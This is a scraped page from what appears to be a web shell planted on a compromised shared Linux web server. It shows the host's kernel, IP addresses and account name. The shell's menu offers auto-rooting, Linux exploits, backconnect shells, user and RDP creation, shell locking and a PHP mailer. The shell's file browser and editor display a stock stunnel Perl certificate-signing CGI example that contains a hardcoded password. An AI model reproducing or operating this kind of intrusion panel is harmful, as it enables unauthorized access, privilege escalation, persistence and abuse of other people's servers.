Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.171
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
stunnel4 /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
ca.html
1.09
KB
-rw-r--r--
ca.pl
1.75
KB
-rwxr-xr-x
importCA.html
409
B
-rw-r--r--
importCA.sh
105
B
-rwxr-xr-x
openssl.cnf
2.22
KB
-rw-r--r--
stunnel.conf-sample
4.43
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ca.pl
#!/usr/bin/perl $config = "/var/openssl/openssl.cnf"; $capath = "/usr/bin/openssl ca"; $certpass = "mypassword"; $tempca = "/tmp/ssl/cli".rand 10000; $tempout = "/tmp/ssl/certtmp".rand 10000; $caout = "/tmp/ssl/certout.txt"; $CAcert = "/var/openssl/localCA/cacert.pem"; $spkac = ""; &ReadForm; $spkac = $FIELDS{'SPKAC'}; $spkac =~ s/\n//g; open(TEMPCE,">$tempca") || die &Error; print TEMPCE "C = $FIELDS{'country'}\n"; print TEMPCE "ST = $FIELDS{'state'}\n"; print TEMPCE "O = $FIELDS{'organization'}\n"; print TEMPCE "Email = $FIELDS{'email'}\n"; print TEMPCE "CN = $FIELDS{'who'}\n"; print TEMPCE "SPKAC = $spkac\n"; close(TEMPCE); system("$capath -batch -config $config -spkac $tempca -out $tempout -key $certpass -cert $CAcert>> $caout 2>&1"); open(CERT,"$tempout") || die &Error; @certificate = <CERT>; close(CERT); #system("rm -f $tempca"); #system("rm -f $tempout"); print "Content-type: application/x-x509-user-cert\n\n"; print @certificate; ############################################################## #### #### Procedures #### sub ReadForm { if ($ENV{'REQUEST_METHOD'} eq 'GET') { @pairs = split(/&/, $ENV{'QUERY_STRING'}); } elsif ($ENV{'REQUEST_METHOD'} eq 'POST') { read(STDIN, $buffer, $ENV{'CONTENT_LENGTH'}); @pairs = split(/&/, $buffer); } foreach $pair (@pairs) { ($name, $value) = split(/=/, $pair); $name =~ tr/+/ /; $name =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; $value =~ tr/+/ /; $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg; $value =~ s/<!--(.|\n)*-->//g; $FIELDS{$name} = $value; } } sub Error { print "Content-type: text/html\n\n"; print "<P><P><center><H1>Can't open file</H1></center>\n"; }
Close